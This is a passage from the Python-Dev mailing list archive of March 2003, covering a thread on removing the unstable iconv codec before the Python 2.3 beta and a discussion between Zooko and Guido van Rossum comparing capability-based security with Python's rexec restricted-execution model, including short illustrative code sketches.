Date: Mon, 31 Mar 2003 17:04:17 +0900
Subject: [Python-Dev] iconv codec
In-Reply-To: <3E87F17A.3080602@lemburg.com>
References: <3E87F17A.3080602@lemburg.com>
Message-ID: <20030331080417.GA52581@fallin.lv>

On Mon, Mar 31, 2003 at 09:42:50AM +0200, M.-A. Lemburg wrote:
> Since the introduction of the iconv codec there have been numerous
> bug reports related to the codec and the lack of cross platform
> support for it (ranging from: the codec doesn't compile and the
> codec doesn't support standard names for common encodings to
> core dumps in the linking phase).
> 
> I'd like to question whether the codec is really ready for prime
> time yet. Right now it causes people more trouble than it does
> any good.

iconv_codec NG is ready to submit to SF. I think the newer
implementation can resolve many of the patch reports. I'll submit
it in a few days. If you have a time, you can review my patches
before my submission. The patch includes ko, zh_CN, zh_TW codecs, also.

A note about another problems on the current iconv_codec:
http://fallin.lv/cvs/~checkout~/py-multibytecodec/reports/iconv.1

The multibytecodecs which is in my patch submission queue:
http://fallin.lv/distfiles/py-multibytecodec-030331.tar.gz

> OTOH, without some field testing the codec will never get into
> shape for prime time, so perhaps it would be better to only
> enable it via a configure option or make a failure to compile
> the codec as painless as possible.

I agree.


    Hye-Shik =)


From mal@lemburg.com  Mon Mar 31 09:38:02 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Mon, 31 Mar 2003 11:38:02 +0200
Subject: [Python-Dev] iconv codec
In-Reply-To: <20030331080417.GA52581@fallin.lv>
References: <3E87F17A.3080602@lemburg.com> <20030331080417.GA52581@fallin.lv>
Message-ID: <3E880C7A.4060405@lemburg.com>

Hye-Shik Chang wrote:
> On Mon, Mar 31, 2003 at 09:42:50AM +0200, M.-A. Lemburg wrote:
> 
>>Since the introduction of the iconv codec there have been numerous
>>bug reports related to the codec and the lack of cross platform
>>support for it (ranging from: the codec doesn't compile and the
>>codec doesn't support standard names for common encodings to
>>core dumps in the linking phase).
>>
>>I'd like to question whether the codec is really ready for prime
>>time yet. Right now it causes people more trouble than it does
>>any good.
> 
> iconv_codec NG is ready to submit to SF. I think the newer
> implementation can resolve many of the patch reports. 

Are you sure ? As I mentioned in my mail, most problems
seem to be related to the platform's iconv implementation,
not so much to the Python one.

> I'll submit
> it in a few days. If you have a time, you can review my patches
> before my submission. 

Sorry, no time for that. I'm heading off to Python UK today.

> The patch includes ko, zh_CN, zh_TW codecs, also.
> 
> A note about another problems on the current iconv_codec:
> http://fallin.lv/cvs/~checkout~/py-multibytecodec/reports/iconv.1
> 
> The multibytecodecs which is in my patch submission queue:
> http://fallin.lv/distfiles/py-multibytecodec-030331.tar.gz
> 
>>OTOH, without some field testing the codec will never get into
>>shape for prime time, so perhaps it would be better to only
>>enable it via a configure option or make a failure to compile
>>the codec as painless as possible.
> 
> I agree.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 31 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                     one day left
EuroPython 2003, Charleroi, Belgium:                        85 days left


From guido@python.org  Mon Mar 31 12:21:04 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 31 Mar 2003 07:21:04 -0500
Subject: [Python-Dev] iconv codec
In-Reply-To: "Your message of Mon, 31 Mar 2003 17:04:17 +0900."
 <20030331080417.GA52581@fallin.lv>
References: <3E87F17A.3080602@lemburg.com> <20030331080417.GA52581@fallin.lv>
Message-ID: <200303311221.h2VCL4Y03446@pcp02138704pcs.reston01.va.comcast.net>

> iconv_codec NG is ready to submit to SF.

Assuming the NG label means this is a completely new implementation, I
propose we drop the current iconv implementation immediately and
consider the NG version as we would consider any newly contributed
module at this point in time (i.e. at most two weeks before the first
beta of 2.3 is released).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From zooko@zooko.com  Mon Mar 31 17:51:03 2003
From: zooko@zooko.com (Zooko)
Date: Mon, 31 Mar 2003 12:51:03 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: Message from Guido van Rossum <guido@python.org>
 of "Sun, 30 Mar 2003 19:09:52 EST." <200303310009.h2V09qx01754@pcp02138704pcs.reston01.va.comcast.net>
References: <Pine.LNX.4.33.0303301445260.22036-100000@server1.lfw.org>  <200303310009.h2V09qx01754@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <E1903R1-0005sc-00@localhost>

 Guido wrote:
>
> I understand how class ZipFile could exercise authority in a
> rexec-based world, if the zipfile module was trusted code.  But I
> thought that a capability view of the world doesn't distinguish
> between trusted and untrusted code.  I guess I need to understand
> better what kind of "barriers" the capability way of life *does* use.

I think you are on track with regard to the deeper question you are grappling 
with.  Almost all dangerous things come ultimately from C code.  (I can think of 
one danger that can come from pure Python code: it can provide an illicit 
communications channel between other objects.)

So in the "separate policy language" way of life, access to the ZipFile class 
gives you the ability to open files anywhere in the filesystem.  The ZipFile 
class therefore has the "dangerous" flag set, and when you run code that you 
think might misuse this feature, you set the "can't use dangerous things" flag 
on that code.

In the capability way of life, it is still the case that access to the ZipFile 
class gives you the ability to open files anywhere in the system!  (That is: I'm 
assuming for now that we implement capabilities without re-writing every 
dangerous class in the Library.)  In this scheme, there are no flags, and when 
you run code that you think might misuse this feature, you simply don't give 
that code a reference to the ZipFile class.  (Also, we have to arrange that it 
can't acquire a reference by "import zipfile".)

So far the two approaches have the same effect, and the difference, for better 
or for worse, is that the policy of "this code can't use ZipFile" is encoded in 
Python reference-management code in the latter and encoded in a pair of flags in 
the former.

Now, we might want to allow certain code to use something else dangerous (such 
as the socket module) while simultaneously disallowing it from using ZipFile.  
As we add N more dangerous modules, and M more objects of untrusted code that we 
want to control, we have an N*M access control matrix to configure which code 
can use which modules.  (In an access control matrix, rows are "subjects" -- 
things that can exercise authority and columns are "resources" -- things that 
might require authority when used.)

In a system where designation is not unified with authority, you tell this 
untrusted code "I want you to do this action X.", and then you also have to go 
update the policy specification to say that the code in question is allowed to 
do the action X.  This "say it twice if you really mean it" overhead puts a 
practical limit on how fine-grained your policies can be, and it adds a source 
of accidents that lead to security holes.

So now with a large or fine-grained access control matrix, we see the "unify 
designation and authority" maxim really shines, and really matches well with 
the Zen of Python.

But there is still another advantage that capabilities offer over other access 
control systems.  With normal access control (and an extremely diligent and 
patient programmer and user) you can in theory achieve the Principle of Least 
Privilege -- that the untrusted code runs with the minimal set of authorities 
necessary to do its job.  However, this is implemented by creating a new 
"principal" -- a new row in the access control matrix, setting the access 
control bits in each element of that row, and preventing any other code from 
setting the bits in that row.

Now, observe that only maximally trusted code -- with "root" authority -- is 
allowed to make these kinds of updates to the access control matrix.  This means 
that all code is divided into two kinds: the kind that can impose 
Least-Privilege on code that it invokes (this code has root authority), and the 
kind that can be constrained by Least-Privilege when it is invoked (this code 
doesn't).

With capabilities there is no such distinction.  All code can be constrained to 
have access to only the privileges that it requires, and at the same time all 
code can constrain other code that it invokes.

This feature, which I call "Higher-Order Principle of Least Privilege" [*] 
enables new applications.

For example, using first-order Least-Privilege a web browser which runs 
cap-Python "caplets" could extend selective privileges to the caplets, such as 
permission to read a certain file, while withholding others, such as permission 
to write to that file, or permission to send the contents of the file to a 
remote computer.

In addition, if cap-Python supports Higher-Order Least-Privilege, those caplets 
could themselves use other caplets ("web services"?) without unnecessarily 
exposing their privileges to those sub-caplets.

One could imagine, for example, a web browser written in cap-Python, which runs 
inside the first web browser (e.g. Mozilla with a cap-Python plug-in), and uses 
cap-Python caplets to extend its (the cap-Python web browser's) functionality.  
If people already had the cap-Python plug-in installed in their local Mozilla, 
then simply visiting the "cap-python-browser.com" site would be sufficient to 
launch the cap-Python web browser.

Of course, this could lead straight to a fully functional desktop, making good 
on Marc Andreesen's old threat to turn the browser into the operating system and 
the operating system into the device driver.  

This would be effectively the "virtualization" of access control.  I regard it 
as a kind of holy Grail for internet computing.

Regards,

Zooko

[*]  I call it that because it is the application of the Principle of Least 
Privilege to the implementation of the Principle of Least Privilege.  One should 
be able to impose least-privilege constraints on the code one uses without 
requiring full root privileges oneself!

http://zooko.com/
         ^-- under re-construction: some new stuff, some broken links


From guido@python.org  Mon Mar 31 19:43:52 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 31 Mar 2003 14:43:52 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: Your message of "Mon, 31 Mar 2003 12:51:03 EST."
 <E1903R1-0005sc-00@localhost>
References: <Pine.LNX.4.33.0303301445260.22036-100000@server1.lfw.org> <200303310009.h2V09qx01754@pcp02138704pcs.reston01.va.comcast.net>
 <E1903R1-0005sc-00@localhost>
Message-ID: <200303311944.h2VJhsA16638@odiug.zope.com>

> Guido wrote:
> >
> > I understand how class ZipFile could exercise authority in a
> > rexec-based world, if the zipfile module was trusted code.  But I
> > thought that a capability view of the world doesn't distinguish
> > between trusted and untrusted code.  I guess I need to understand
> > better what kind of "barriers" the capability way of life *does* use.

[Zooko]
> I think you are on track with regard to the deeper question you are
> grappling with.  Almost all dangerous things come ultimately from C
> code.  (I can think of one danger that can come from pure Python
> code: it can provide an illicit communications channel between other
> objects.)
> 
> So in the "separate policy language" way of life, access to the
> ZipFile class gives you the ability to open files anywhere in the
> filesystem.  The ZipFile class therefore has the "dangerous" flag
> set, and when you run code that you think might misuse this feature,
> you set the "can't use dangerous things" flag on that code.

But that's not how rexec works.  In the rexec world, the zipfile
module has no special privileges; when it is imported by untrusted
code, it is reloaded from disk as if it were untrusted itself.  The
zipfile.ZipFile class is a client of "open", an implementation of
which is provided to the untrusted code by the trusted code.  This
implementation does access checking (according to a separate policy
language, indeed).  So importing Python modules is always safe for
untrusted code, because the imported Python code derives its authority
from whatever the untrusted user already has.  (It's different for C
extension modules of course.)

> In the capability way of life, it is still the case that access to
> the ZipFile class gives you the ability to open files anywhere in
> the system!  (That is: I'm assuming for now that we implement
> capabilities without re-writing every dangerous class in the
> Library.)  In this scheme, there are no flags, and when you run code
> that you think might misuse this feature, you simply don't give that
> code a reference to the ZipFile class.  (Also, we have to arrange
> that it can't acquire a reference by "import zipfile".)

The rexec world solves this very nicely IMO.  Can't the capability
world do it the same way?  The only difference might be that 'open'
would have to be a capability.

> So far the two approaches have the same effect, and the difference,
> for better or for worse, is that the policy of "this code can't use
> ZipFile" is encoded in Python reference-management code in the
> latter and encoded in a pair of flags in the former.

But I think "this code can't use ZipFile" is the wrong thing to say.
You should only have to say "this code can't write files" (or
something more specific).

> Now, we might want to allow certain code to use something else
> dangerous (such as the socket module) while simultaneously
> disallowing it from using ZipFile.  As we add N more dangerous
> modules, and M more objects of untrusted code that we want to
> control, we have an N*M access control matrix to configure which
> code can use which modules.  (In an access control matrix, rows are
> "subjects" -- things that can exercise authority and columns are
> "resources" -- things that might require authority when used.)

In the rexec world, modules and classes don't have separate privileges
-- the privileges are held by a larger concept, which we might call a
"workspace".  The rexec world allows many workspaces with different
privileges -- but no communication between them.

> In a system where designation is not unified with authority, you
> tell this untrusted code "I want you to do this action X.", and then
> you also have to go update the policy specification to say that the
> code in question is allowed to do the action X.

Sorry, you've lost me here.  Which part is the "designation" (new word
for me) and which part is the "authority"?

> This "say it twice if you really mean it" overhead puts a practical
> limit on how fine-grained your policies can be, and it adds a source
> of accidents that lead to security holes.
> 
> So now with a large or fine-grained access control matrix, we see
> the "unify designation and authority" maxim really shines, and
> really matches well with the Zen of Python.

Sorry, this is too abstract for me to see (yet).  You are sounding a
bit like a used-car salesman here, or "Proof by using Big Words". :-)

> But there is still another advantage that capabilities offer over
> other access control systems.  With normal access control (and an
> extremely diligent and patient programmer and user) you can in
> theory achieve the Principle of Least Privilege -- that the
> untrusted code runs with the minimal set of authorities necessary to
> do its job.  However, this is implemented by creating a new
> "principal" -- a new row in the access control matrix, setting the
> access control bits in each element of that row, and preventing any
> other code from setting the bits in that row.
> 
> Now, observe that only maximally trusted code -- with "root"
> authority -- is allowed to make these kinds of updates to the access
> control matrix.  This means that all code is divided into two kinds:
> the kind that can impose Least-Privilege on code that it invokes
> (this code has root authority), and the kind that can be constrained
> by Least-Privilege when it is invoked (this code doesn't).

In the rexec world, it is possible for a restricted workspace (at
least in theory -- the rexec module may not be directly usable but
something similar could) to create another workspace and selectively
pass privileges into that workspace.

> With capabilities there is no such distinction.  All code can be
> constrained to have access to only the privileges that it requires,
> and at the same time all code can constrain other code that it
> invokes.
> 
> This feature, which I call "Higher-Order Principle of Least
> Privilege" [*] enables new applications.

Sorry, more "Big Words". :-)

> For example, using first-order Least-Privilege a web browser which
> runs cap-Python "caplets" could extend selective privileges to the
> caplets, such as permission to read a certain file, while
> withholding others, such as permission to write to that file, or
> permission to send the contents of the file to a remote computer.
> 
> In addition, if cap-Python supports Higher-Order Least-Privilege,
> those caplets could themselves use other caplets ("web services"?) 
> without unnecessarily exposing their privileges to those
> sub-caplets.

It really sounds to me like at least one of our fundamental (?)
differences is the autonomicity of code units.  I think of code (at
least Python code) as a passive set of instructions that has no
inherent authority but derives authority from the built-ins passed to
it; you seem to describe code as having inherent authority.

> One could imagine, for example, a web browser written in cap-Python,
> which runs inside the first web browser (e.g. Mozilla with a
> cap-Python plug-in), and uses cap-Python caplets to extend its (the
> cap-Python web browser's) functionality.  If people already had the
> cap-Python plug-in installed in their local Mozilla, then simply
> visiting the "cap-python-browser.com" site would be sufficient to
> launch the cap-Python web browser.
> 
> Of course, this could lead straight to a fully functional desktop,
> making good on Marc Andreesen's old threat to turn the browser into
> the operating system and the operating system into the device
> driver.
> 
> This would be effectively the "virtualization" of access control.  I
> regard it as a kind of holy Grail for internet computing.

How practical is this dream?  How useful?

> Regards,
> 
> Zooko
> 
> [*] I call it that because it is the application of the Principle of
> Least Privilege to the implementation of the Principle of Least
> Privilege.  One should be able to impose least-privilege constraints
> on the code one uses without requiring full root privileges oneself!
> 
> http://zooko.com/
>          ^-- under re-construction: some new stuff, some broken links

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin@v.loewis.de  Mon Mar 31 21:41:50 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 31 Mar 2003 23:41:50 +0200
Subject: [Python-Dev] iconv codec
In-Reply-To: <200303311221.h2VCL4Y03446@pcp02138704pcs.reston01.va.comcast.net>
References: <3E87F17A.3080602@lemburg.com> <20030331080417.GA52581@fallin.lv>
 <200303311221.h2VCL4Y03446@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <m3el4nusbl.fsf@mira.informatik.hu-berlin.de>

Guido van Rossum <guido@python.org> writes:

> Assuming the NG label means this is a completely new implementation, I
> propose we drop the current iconv implementation immediately and
> consider the NG version as we would consider any newly contributed
> module at this point in time (i.e. at most two weeks before the first
> beta of 2.3 is released).

Ok. Given the reported problems with the iconv module, and the
prospect of getting a complete rewrite, I'll back out the current
code.

This is quite sad, IMO, as the code *is* useful for the platforms on
which it works, and this *is* the majority of the installations on
which it is currently built.

Regards,
Martin


From guido@python.org  Mon Mar 31 22:10:36 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 31 Mar 2003 17:10:36 -0500
Subject: [Python-Dev] iconv codec
In-Reply-To: Your message of "31 Mar 2003 23:41:50 +0200."
 <m3el4nusbl.fsf@mira.informatik.hu-berlin.de>
References: <3E87F17A.3080602@lemburg.com> <20030331080417.GA52581@fallin.lv> <200303311221.h2VCL4Y03446@pcp02138704pcs.reston01.va.comcast.net>
 <m3el4nusbl.fsf@mira.informatik.hu-berlin.de>
Message-ID: <200303312210.h2VMAba24516@odiug.zope.com>

> > Assuming the NG label means this is a completely new implementation, I
> > propose we drop the current iconv implementation immediately and
> > consider the NG version as we would consider any newly contributed
> > module at this point in time (i.e. at most two weeks before the first
> > beta of 2.3 is released).
> 
> Ok. Given the reported problems with the iconv module, and the
> prospect of getting a complete rewrite, I'll back out the current
> code.
> 
> This is quite sad, IMO, as the code *is* useful for the platforms on
> which it works, and this *is* the majority of the installations on
> which it is currently built.

But given that it's only got a small audience, a 3rd party module
would satisfy the need just as well, right?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From zooko@zooko.com  Mon Mar 31 22:22:41 2003
From: zooko@zooko.com (Zooko)
Date: Mon, 31 Mar 2003 17:22:41 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: Message from Guido van Rossum <guido@python.org>
 of "Mon, 31 Mar 2003 14:43:52 EST." <200303311944.h2VJhsA16638@odiug.zope.com>
References: <Pine.LNX.4.33.0303301445260.22036-100000@server1.lfw.org> <200303310009.h2V09qx01754@pcp02138704pcs.reston01.va.comcast.net> <E1903R1-0005sc-00@localhost>  <200303311944.h2VJhsA16638@odiug.zope.com>
Message-ID: <E1907fu-0007r9-00@localhost>

It's apparent that I didn't explain capabilities clearly enough.  Also 
I misunderstood something about rexec in general and ZipFile in particular.  
Once we succeed at understanding each other, I'll then inquire whether you agree 
with my Big Word Proofs.

(I, Zooko, wrote lines prepended with "> > ".)

 Guido wrote:
>
> > So in the "separate policy language" way of life, access to the
> > ZipFile class gives you the ability to open files anywhere in the
> > filesystem.  The ZipFile class therefore has the "dangerous" flag
> > set, and when you run code that you think might misuse this feature,
> > you set the "can't use dangerous things" flag on that code.
> 
> But that's not how rexec works.  In the rexec world, the zipfile
> module has no special privileges; when it is imported by untrusted
> code, it is reloaded from disk as if it were untrusted itself.  The
> zipfile.ZipFile class is a client of "open", an implementation of
> which is provided to the untrusted code by the trusted code.

<Zooko reads the zipfile module docs.>

How is the implementation of "open" provided by the trusted code to the 
untrusted code?  Is it possible to provide a different "open" implementation to 
different "instances" of the zipfile module?  (I think not, as there is no such 
thing as "a different instance of a module", but perhaps you could have two 
rexec "workspaces" each of which has a zipfile module with a different "open"?)

> > In this scheme, there are no flags, and when you run code
> > that you think might misuse this feature, you simply don't give that
> > code a reference to the ZipFile class.  (Also, we have to arrange
> > that it can't acquire a reference by "import zipfile".)
> 
> The rexec world solves this very nicely IMO.  Can't the capability
> world do it the same way?  The only difference might be that 'open'
> would have to be a capability.

I don't understand exactly how rexec works yet, but so far it sounds like 
capabilities.

Here's a two sentence definition of capabilities:

Authority originates in C code (in the interpreter or C extension modules), and 
is passed from thing to thing.  A given thing "X" -- an instance of ZipFile, for 
example -- has the authority to use a given authority -- to invoke the real 
open(), for example -- if and only if some thing "Y" previously held both the 
"open()" authority and the "authority to extend authorities to X" authority, and 
chose to extend the "open()" authority to X.  

That rule could be enforced with the rexec system, right?

Here is a graphical representation of this rule.  (Taken from [1].)

http://www.erights.org/elib/capability/ode/images/fundamental.gif

In the diagram, the authority is "Carol", the thing that started with the 
authority is "Alice", and Alice is in the process of extending to Bob the 
authority to use Carol.  This act -- the extending of authority from Alice to 
Bob -- is the only way that Bob can gain authority, and it can only happen if 
Alice has both the authority to use Carol and the authority to extend 
authorities to Bob.

Those two sentences above (and equivalently the graph) completely define 
capabilities, in the abstract.  They don't say how they are implemented.  A 
particular implementation that I find deeply appealing is to make "has a 
reference to 'open'" be the determiner of whether a thing has the authority to 
use "open", and to make "has a reference to X" be the determiner of whether a 
thing has the authority to extend authorities to X.  That's "unifying 
designation with authority", and that's what the E language does.


> But I think "this code can't use ZipFile" is the wrong thing to say.
> You should only have to say "this code can't write files" (or
> something more specific).

I agree.  I incorrectly inferred from previous messages that the current problem 
under discussion was allowing or denying access to the ZipFile class.  But 
whatever resource we wish to control access to, these same techniques will 
apply.

> > In a system where designation is not unified with authority, you
> > tell this untrusted code "I want you to do this action X.", and then
> > you also have to go update the policy specification to say that the
> > code in question is allowed to do the action X.
> 
> Sorry, you've lost me here.  Which part is the "designation" (new word
> for me) and which part is the "authority"?

Sorry.  First let me point out that the issue of unifying designation with 
authority is separable from "the capability access control rule" described 
above.  The two have good synergy, but aren't identical.

By "designation" I meant "naming".  For example...  Let's see, I think I'll go 
back to my toy tictactoe example from [2].

In the tictactoe example, you have to specify which wxWindow the tictactoe game 
object should draw into.  This is "designation" -- you pass a reference, which 
designates which specific window you are talking about.  If you use the 
principle of unifying designation and authority, then this same act -- passing a 
reference to this particular wxWindows object -- conveys both the identification 
of which window to draw into and the authority to draw into it.

# access control system with unified designation and authority
game = TicTacToeGame()
game.display(wxPython.wxWindow())

If you have separate designation and authority, then the same code has to look 
something like this:

# access control system with separate designation and authority
game = TicTacToeGame()
window = wxPython.wxWindow()
def policy(subject, resource, operation):
 if (subject is game) and (resource is window) and \
   (operation == "invoke methods of"):
  return True
 return False
rexec.register_policy_hook(policy)
game.display(window)

This is what I call "say it twice if you really mean it".

Hm.  Reviewing the rexec docs, I being to suspect that the "access control 
system with unified designation and authority" *is* how Python does access 
control in restricted mode, and that rexec itself is just to manage module 
import and certain dangerous builtins.


> It really sounds to me like at least one of our fundamental (?)
> differences is the autonomicity of code units.  I think of code (at
> least Python code) as a passive set of instructions that has no
> inherent authority but derives authority from the built-ins passed to
> it; you seem to describe code as having inherent authority.

I definitely don't intend for code to have inherent authority (other than the 
Trusted Code Base -- the interpreter --  which can't help but have it).  The 
word "thing" in my two-sentence definition (a white circle in the diagram) are 
"computational things that can have state and behavior".  (This includes Python 
objects, closures, stack frames, etc...  In another context I would call them 
"objects", but Python uses the word "object" for something more specific -- an 
instance of a class.)

> > This would be effectively the "virtualization" of access control.  I
> > regard it as a kind of holy Grail for internet computing.
> 
> How practical is this dream?  How useful?

Let's revisit the issue once we understand one another's access control schemes.
;-)

Regards,

Zooko

[1] http://www.erights.org/elib/capability/ode/overview.html
[2] http://mail.python.org/pipermail/python-dev/2003-March/033938.html

http://zooko.com/
         ^-- under re-construction: some new stuff, some broken links


From guido@python.org  Mon Mar 31 22:43:09 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 31 Mar 2003 17:43:09 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: Your message of "Mon, 31 Mar 2003 17:22:41 EST."
 <E1907fu-0007r9-00@localhost>
References: <Pine.LNX.4.33.0303301445260.22036-100000@server1.lfw.org> <200303310009.h2V09qx01754@pcp02138704pcs.reston01.va.comcast.net> <E1903R1-0005sc-00@localhost> <200303311944.h2VJhsA16638@odiug.zope.com>
 <E1907fu-0007r9-00@localhost>
Message-ID: <200303312243.h2VMhCC24639@odiug.zope.com>

[Zooko]
> It's apparent that I didn't explain capabilities clearly enough.
> Also I misunderstood something about rexec in general and ZipFile in
> particular.  Once we succeed at understanding each other, I'll then
> inquire whether you agree with my Big Word Proofs.

It's apparent that you don't understand rexec enough; I'll try to
explain.

> (I, Zooko, wrote lines prepended with "> > ".)
> 
>  Guido wrote:
> >
> > > So in the "separate policy language" way of life, access to the
> > > ZipFile class gives you the ability to open files anywhere in the
> > > filesystem.  The ZipFile class therefore has the "dangerous" flag
> > > set, and when you run code that you think might misuse this feature,
> > > you set the "can't use dangerous things" flag on that code.
> > 
> > But that's not how rexec works.  In the rexec world, the zipfile
> > module has no special privileges; when it is imported by untrusted
> > code, it is reloaded from disk as if it were untrusted itself.  The
> > zipfile.ZipFile class is a client of "open", an implementation of
> > which is provided to the untrusted code by the trusted code.
> 
> <Zooko reads the zipfile module docs.>
> 
> How is the implementation of "open" provided by the trusted code to
> the untrusted code?  Is it possible to provide a different "open"
> implementation to different "instances" of the zipfile module?  (I
> think not, as there is no such thing as "a different instance of a
> module", but perhaps you could have two rexec "workspaces" each of
> which has a zipfile module with a different "open"?)

To the contrary, it is very easy to provide code with a different
version of open().  E.g.:

  # this executes as trusted code
  def my_open(...):
    "open() variant that only allows reading"
  my_builtins = {"len": len, "open": my_open, "range": range, ...}
  namespace = {"__builtins__": my_builtins}
  exec "..." in namespace

The final exec executes the untrusted code string "..." in a
restricted environment where the built-in 'open' refers to my_open.
Because import statements are also treated this way (they call the
builtin function __import__), the same applies for import.  IOW,
namespace["__builtins__"] acts as the set of "root capabilities" given
to the untrusted code.

> > > In this scheme, there are no flags, and when you run code that
> > > you think might misuse this feature, you simply don't give that
> > > code a reference to the ZipFile class.  (Also, we have to
> > > arrange that it can't acquire a reference by "import zipfile".)
> > 
> > The rexec world solves this very nicely IMO.  Can't the capability
> > world do it the same way?  The only difference might be that
> > 'open' would have to be a capability.
> 
> I don't understand exactly how rexec works yet, but so far it sounds
> like capabilities.

Yes.  That may be why the demand for capabilities has been met with
resistance: to quote the French in "Monty Python and the Holy Grail",
"we already got one!" :-)

> Here's a two sentence definition of capabilities:

I've heard too many of these.  They are all too abstract.

> Authority originates in C code (in the interpreter or C extension
> modules), and is passed from thing to thing.

This part I like.

> A given thing "X" -- an instance of ZipFile, for example -- has the
> authority to use a given authority -- to invoke the real open(), for
> example -- if and only if some thing "Y" previously held both the
> "open()" authority and the "authority to extend authorities to X"
> authority, and chose to extend the "open()" authority to X.

But the instance of ZipFile is not really a protection domain.
Methods on the instance may have different authority.

> That rule could be enforced with the rexec system, right?

Yes, except that there are currently design bugs (starting in Python
2.2) that open holes; see Samuele Pedroni's posts here.

> Here is a graphical representation of this rule.  (Taken from [1].)
> 
> http://www.erights.org/elib/capability/ode/images/fundamental.gif
> 
> In the diagram, the authority is "Carol", the thing that started
> with the authority is "Alice", and Alice is in the process of
> extending to Bob the authority to use Carol.  This act -- the
> extending of authority from Alice to Bob -- is the only way that Bob
> can gain authority, and it can only happen if Alice has both the
> authority to use Carol and the authority to extend authorities to
> Bob.

Sure.  The question is, what exactly are Alice, Bob and Carol?  I
claim that they are not specific class instances but they are each a
"workspace" as I tried to explain before.  A workspace is more or less
the contents of a particular "sys.modules" dictionary.

> Those two sentences above (and equivalently the graph) completely
> define capabilities, in the abstract.  They don't say how they are
> implemented.  A particular implementation that I find deeply
> appealing is to make "has a reference to 'open'" be the determiner
> of whether a thing has the authority to use "open", and to make "has
> a reference to X" be the determiner of whether a thing has the
> authority to extend authorities to X.  That's "unifying designation
> with authority", and that's what the E language does.

Yes.  And then "has a reference to 'open'" is bootstrapped by sticking
(some variant of) 'open' in the __builtin__ module of a particular
"workspace".  (Note that workspace is a term I'm inventing here, you
won't find it in the Python literature.)

> > But I think "this code can't use ZipFile" is the wrong thing to
> > say.  You should only have to say "this code can't write files"
> > (or something more specific).
> 
> I agree.  I incorrectly inferred from previous messages that the
> current problem under discussion was allowing or denying access to
> the ZipFile class.  But whatever resource we wish to control access
> to, these same techniques will apply.
> 
> > > In a system where designation is not unified with authority, you
> > > tell this untrusted code "I want you to do this action X.", and
> > > then you also have to go update the policy specification to say
> > > that the code in question is allowed to do the action X.
> > 
> > Sorry, you've lost me here.  Which part is the "designation" (new
> > word for me) and which part is the "authority"?
> 
> Sorry.  First let me point out that the issue of unifying
> designation with authority is separable from "the capability access
> control rule" described above.  The two have good synergy, but
> aren't identical.
> 
> By "designation" I meant "naming".  For example...  Let's see, I
> think I'll go back to my toy tictactoe example from [2].
> 
> In the tictactoe example, you have to specify which wxWindow the
> tictactoe game object should draw into.  This is "designation" --
> you pass a reference, which designates which specific window you are
> talking about.  If you use the principle of unifying designation and
> authority, then this same act -- passing a reference to this
> particular wxWindows object -- conveys both the identification of
> which window to draw into and the authority to draw into it.
> 
> # access control system with unified designation and authority
> game = TicTacToeGame()
> game.display(wxPython.wxWindow())
> 
> If you have separate designation and authority, then the same code
> has to look something like this:
> 
> # access control system with separate designation and authority
> game = TicTacToeGame()
> window = wxPython.wxWindow()
> def policy(subject, resource, operation):
>  if (subject is game) and (resource is window) and \
>    (operation == "invoke methods of"):
>   return True
>  return False
> rexec.register_policy_hook(policy)
> game.display(window)
> 
> This is what I call "say it twice if you really mean it".
> 
> Hm.  Reviewing the rexec docs, I being to suspect that the "access
> control system with unified designation and authority" *is* how
> Python does access control in restricted mode, and that rexec itself
> is just to manage module import and certain dangerous builtins.

Yes.

> > It really sounds to me like at least one of our fundamental (?)
> > differences is the autonomicity of code units.  I think of code
> > (at least Python code) as a passive set of instructions that has
> > no inherent authority but derives authority from the built-ins
> > passed to it; you seem to describe code as having inherent
> > authority.
> 
> I definitely don't intend for code to have inherent authority (other
> than the Trusted Code Base -- the interpreter -- which can't help
> but have it).  The word "thing" in my two-sentence definition (a
> white circle in the diagram) are "computational things that can have
> state and behavior".  (This includes Python objects, closures, stack
> frames, etc...  In another context I would call them "objects", but
> Python uses the word "object" for something more specific -- an
> instance of a class.)
> 
> > > This would be effectively the "virtualization" of access control.  I
> > > regard it as a kind of holy Grail for internet computing.
> > 
> > How practical is this dream?  How useful?
> 
> Let's revisit the issue once we understand one another's access
> control schemes.
> ;-)
> 
> Regards,
> 
> Zooko
> 
> [1] http://www.erights.org/elib/capability/ode/overview.html
> [2] http://mail.python.org/pipermail/python-dev/2003-March/033938.html

I propose to continue this in a week; I'm leaving for Python UK right
now and expect to have scarce connectivity there if at all.  Back
Sunday night.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From drifty@alum.berkeley.edu  Mon Mar 31 22:49:29 2003
From: drifty@alum.berkeley.edu (Brett Cannon)
Date: Mon, 31 Mar 2003 14:49:29 -0800 (PST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <200303312243.h2VMhCC24639@odiug.zope.com>
References: <Pine.LNX.4.33.0303301445260.22036-100000@server1.lfw.org>
 <200303310009.h2V09qx01754@pcp02138704pcs.reston01.va.comcast.net>
 <E1903R1-0005sc-00@localhost> <200303311944.h2VJhsA16638@odiug.zope.com>
 <E1907fu-0007r9-00@localhost>  <200303312243.h2VMhCC24639@odiug.zope.com>
Message-ID: <Pine.SOL.4.53.0303311447020.28740@death.OCF.Berkeley.EDU>

[Guido van Rossum]

> I propose to continue this in a week; I'm leaving for Python UK right
> now and expect to have scarce connectivity there if at all.  Back
> Sunday night.
>

Which means it will get summarized in *three* separate summaries.  This
thread will never die!!!  I am going to become a capabilities expert
whether I want to or not.  =)

-Brett


From greg@cosc.canterbury.ac.nz  Mon Mar 31 22:50:59 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
